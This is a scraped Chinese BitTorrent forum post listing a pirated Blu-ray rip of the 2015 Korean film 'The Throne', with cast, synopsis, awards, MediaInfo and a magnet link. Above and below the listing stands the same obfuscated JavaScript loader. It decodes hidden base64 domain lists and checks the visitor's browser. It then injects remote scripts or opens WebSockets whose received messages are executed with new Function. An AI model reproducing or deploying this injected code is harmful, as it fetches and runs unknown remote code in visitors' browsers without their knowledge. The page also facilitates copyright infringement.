思悼[中文字幕].The.Throne.2015.1080p.BluRay.x265.10bit.DTS 7.05GB

版主小s 1月前 328

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 思悼 / 思悼:八日的记忆 / 逆伦王朝(台) / The Throne

◎片 名 ??

◎年 代 2015

◎产 地 韩国

◎类 别 剧情 / 历史

◎语 言 韩语

◎上映日期 2015-09-16(韩国)

◎IMDb链接 https://www.imdb.com/title/tt4010918/

◎豆瓣评分 8.4/10 (104696人评价)

◎豆瓣链接 https://movie.douban.com/subject/25859495/

◎片 长 125分钟

◎导 演 李濬益 Jun-ik Lee (id:1028844)

◎编 剧 曹喆铉 Cheol-Hyeon Jo (id:1350648)

吴胜贤 Sung Hyeon Oh (id:1433578)

◎演 员 宋康昊 Kang-ho Song (id:1031238)

刘亚仁 Ah-in Yoo (id:1246859)

文根英 Geun-Young Moon (id:1192232)

全慧珍 Hye-jin Jeon (id:1317027)

金海淑 Hae-suk Kim (id:1015294)

朴元尚 Won-sang Park (id:1172138)

陈智熙 Ji-hee Jin (id:1275681)

朴素丹 So-dam Park (id:1343344)

徐睿知 Ye-ji Seo (id:1337233)

李代延 Dae-yeon Lee (id:1042754)

崔德门 Dok-mun Choi (id:1350259)

郑锡勇 Seok-yong Jeong (id:1339692)

崔民哲 Min-cheol Choi (id:1382623)

朴明申 Myung-shin Park (id:1381298)

赵胜渊 Seung-Yeon Jo (id:1374969)

严智星 Ji-seong Eom (id:1351949)

苏志燮 Ji-seob So (id:1042119)

李孝制 Hyojae Lee (id:1352004)

郑海钧 Hae-kyun Jung (id:1359476)

申秀妍 Soo-yun Shin (id:1406115)

金惠仁 Hye-In Kim (id:1379130)

申菲 Bi Shin (id:1438058)

郑西仁 Seo-In Jeong (id:1423713)

车顺裴 Cha Soon-bae (id:1377778)

权范泽 Bum-taek Kwon (id:1386230)

卞宇钟 Byeon-woo Jong (id:1436218)

孙德基 Deok-ki Son (id:1387461)

安正宇 Jung-woo Ahn (id:1351950)

吴胜贤 Sung Hyeon Oh (id:1433578)

方俊锡 Jun-seok Bang (id:1370746)

金泰庆 Tae-kyung Kim (id:1353561)

李姬妍 Ji-yeon Lee (id:1370733)

申贤燮 Hyeon-seop Sim (id:1331992)

◎标 签 韩国 / 历史 / 父子 / 人性 / 古装 / 剧情 / 传记 / 悲剧

◎简 介

18世纪初,朝鲜李氏王朝正值英祖(宋康昊 饰)在位时期。英祖舐犊情深,在长子早逝后,他全部希望寄托在次子李愃(刘亚仁 饰)身上。不仅在他刚出生之际就册封为世子,更为其安排名臣督导功课。然而天不遂人意,世子耽于玩乐,无心学业,英祖一度提拔世子代理国政,可却使这对站在权力顶峰的父子渐行渐远。在一个瓢泼雨夜,世子杖刀闯入王宫。次日,他因意图谋反而遭到英祖的训斥,并被锁入米柜之中。在接下来的八日里,这对形同寇仇的父子各自回忆起过往的种种。

也许翻为平民父子更好,王宫内院最残酷的竟发生在最亲近人的中间……

◎获奖情况 (共22项)

第36届韩国电影青龙奖 (2015)

最佳男主角

└──刘亚仁 (id:1246859)

最佳女配角

└──全慧珍 (id:1317027)

最佳摄影

最佳配乐

最佳照明

第10届亚洲电影大奖 (2016)

最佳原创音乐(提名)

└──方俊锡 (id:1370746)

最佳造型设计

第52届百想艺术大赏 (2016)

电影类 大赏

└──李濬益 (id:1028844)

电影类 最佳男主角(提名)

电影类 最佳女配角(提名)

└──全慧珍 (id:1317027)

电影类 最佳人气男演员(提名)

电影类 最佳人气女演员(提名)

第52届韩国电影大钟奖 (2015)

最佳影片(提名)

最佳导演(提名)

└──李濬益 (id:1028844)

最佳男主角(提名)

└──刘亚仁 (id:1246859)

最佳女配角

└──金海淑 (id:1015294)

最佳美术(提名)

最佳音乐(提名)

└──方俊锡 (id:1370746)

最佳服装(提名)

└──申贤燮 (id:1331992)

第2届豆瓣电影年度榜单 (2015)

评分最高的韩国电影

第6届豆瓣电影鑫像奖 (2016)

鑫豆单元 最佳男演员(外语)(提名)

└──刘亚仁 (id:1246859)

鑫豆单元 最佳韩国电影(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 160910355574087997413111451129076903054 (0x790E350C1F2B99D12B06985BD6E5EC8E)

  4. Complete name : [email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 7.05 GiB

  8. Duration : 2 h 5 min

  9. Overall bit rate : 8 042 kb/s

  10. Movie name : The Throne 2015

  11. Encoded date : UTC 2021-10-11 02:28:05

  12. Writing application : mkvmerge v57.0.0 ('Till The End') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 2 h 5 min

  23. Bit rate : 6 453 kb/s

  24. Width : 1 920 pixels

  25. Height : 804 pixels

  26. Display aspect ratio : 2.40:1

  27. Frame rate mode : Constant

  28. Frame rate : 23.976 (24000/1001/53354) FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.174

  33. Stream size : 5.66 GiB (80%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=17.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x804 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default : Yes

  37. Forced : No


  38. Audio

  39. ID : 2

  40. ID in the original source medium : 4352 (0x1100)

  41. Format : DTS

  42. Format/Info : Digital Theater Systems

  43. Codec ID : A_DTS

  44. Duration : 2 h 5 min

  45. Bit rate mode : Constant

  46. Bit rate : 1 509 kb/s

  47. Channel(s) : 6 channels

  48. Channel layout : C L R Ls Rs LFE

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 93.750 FPS (512 SPF)

  51. Bit depth : 24 bits

  52. Compression mode : Lossy

  53. Stream size : 1.32 GiB (19%)

  54. Language : Korean

  55. Default : Yes

  56. Forced : No

  57. Original source medium : Blu-ray


  58. Text #1

  59. ID : 3

  60. ID in the original source medium : 4610 (0x1202)

  61. Format : PGS

  62. Muxing mode : zlib

  63. Codec ID : S_HDMV/PGS

  64. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  65. Duration : 2 h 0 min

  66. Bit rate : 34.3 kb/s

  67. Count of elements : 4370

  68. Stream size : 29.6 MiB (0%)

  69. Title : chs

  70. Language : Chinese

  71. Default : Yes

  72. Forced : No

  73. Original source medium : Blu-ray


  74. Text #2

  75. ID : 4

  76. ID in the original source medium : 4611 (0x1203)

  77. Format : PGS

  78. Muxing mode : zlib

  79. Codec ID : S_HDMV/PGS

  80. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  81. Duration : 2 h 0 min

  82. Bit rate : 34.3 kb/s

  83. Count of elements : 4370

  84. Stream size : 29.6 MiB (0%)

  85. Title : cht

  86. Language : Chinese

  87. Default : No

  88. Forced : No

  89. Original source medium : Blu-ray


  90. Text #3

  91. ID : 5

  92. ID in the original source medium : 4608 (0x1200)

  93. Format : PGS

  94. Muxing mode : zlib

  95. Codec ID : S_HDMV/PGS

  96. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  97. Duration : 1 h 56 min

  98. Bit rate : 27.2 kb/s

  99. Count of elements : 2122

  100. Stream size : 22.7 MiB (0%)

  101. Language : Korean

  102. Default : No

  103. Forced : No

  104. Original source medium : Blu-ray


  105. Text #4

  106. ID : 6

  107. ID in the original source medium : 4609 (0x1201)

  108. Format : PGS

  109. Muxing mode : zlib

  110. Codec ID : S_HDMV/PGS

  111. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  112. Duration : 1 h 56 min

  113. Bit rate : 30.5 kb/s

  114. Count of elements : 2143

  115. Stream size : 25.5 MiB (0%)

  116. Language : English

  117. Default : No

  118. Forced : No

  119. Original source medium : Blu-ray


  120. Menu

  121. 00:00:00.000 : Chapter 01

  122. 00:17:28.922 : Chapter 02

  123. 00:28:29.624 : Chapter 03

  124. 00:49:38.600 : Chapter 04

  125. 01:06:03.876 : Chapter 05

  126. 01:14:58.911 : Chapter 06

  127. 01:37:57.746 : Chapter 07

  128. 01:49:03.411 : Chapter 08


TAGS 剧情 历史

磁力链:
  • magnet:?xt=urn:btih:1649A187CE922F239E72A39D3B886AA74544EC4D

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};